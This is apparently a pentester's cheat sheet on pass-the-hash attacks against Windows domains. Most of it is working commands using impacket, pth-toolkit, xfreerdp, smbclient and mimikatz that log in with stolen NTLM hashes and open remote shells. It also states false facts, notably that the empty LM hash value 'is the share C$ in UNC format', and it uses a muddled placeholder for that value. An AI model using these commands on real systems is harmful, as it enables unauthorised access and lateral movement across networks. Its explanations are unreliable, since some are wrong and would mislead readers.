Pass the hash allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case. It replaces the need for stealing the plaintext password with merely stealing the hash and using that to authenticate with.
💡 See Evil-WinRM if port 5985 is open.
Impacket
USER=Administrator
HASH=<LM hash>:<NTLM hash>
impacket-psexec -dc-ip $DC_IP -hashes ${HASH} ${DOMAIN}/${USER}@${IP}impacket-wmiexec ${DOMAIN}/${USER}@${IP} -hashes aad3b435b51404eeaad3b435b51404ee:${HASH}Passing-The-Hash toolkit
Already installed in Kali Linux.
- Official Documentation (GitHub)
Help
Available tools: winexe, wmic, wmis, rpcclient, smbclient, smbget, net
pth-winexeExamples
pth-net rpc info -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IPpth-net rpc user -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IPpth-net rpc group -U 'example.com/john%00000000000000000000000000000000:<ntlm hash>' -S $IPpth-net status sessions -U 'example.com/<username>%00000000000000000000000000000000:<ntlm hash>' -S $IPPass-the-Hash – SMB Share
NOTE: aad3b435b51404eeaad3b435b51404ee is the share C$ in UNC format.
pth-winexe -U <username>%<smb share (md5)>:<NTLM hash> //$IP cmdpth-winexe -U domain/username%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //$IP cmdImpacket scripts
Not sure, hash is usually LM:NTLM… to validate
impacket-wmiexec ${DOMAIN}/${USER}@${IP} -hashes aad3b435b51404eeaad3b435b51404ee:${HASH}Get a semi-interactive shell!
impacket-smbexec -hashes :${HASH} ${DOMAIN}/${USER}@${IP}RDP
See Pass-the-Hash in Windows 10 (SANS)
Alternative ways to Pass the Hash (PtH) for more details on restrictions.
Use the NTLM hash, not LM:NTLM!
xfreerdp /cert:ignore /v:${IP} /u:${USER} /pth:${NTLM_HASH}SMB
See smbclient.
smbclient //${IP}/myshare -U $USER --pw-nt-hash $HASH -W $DOMAINMimikatz
Lateral Movement: Pass the Hash Attack
mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38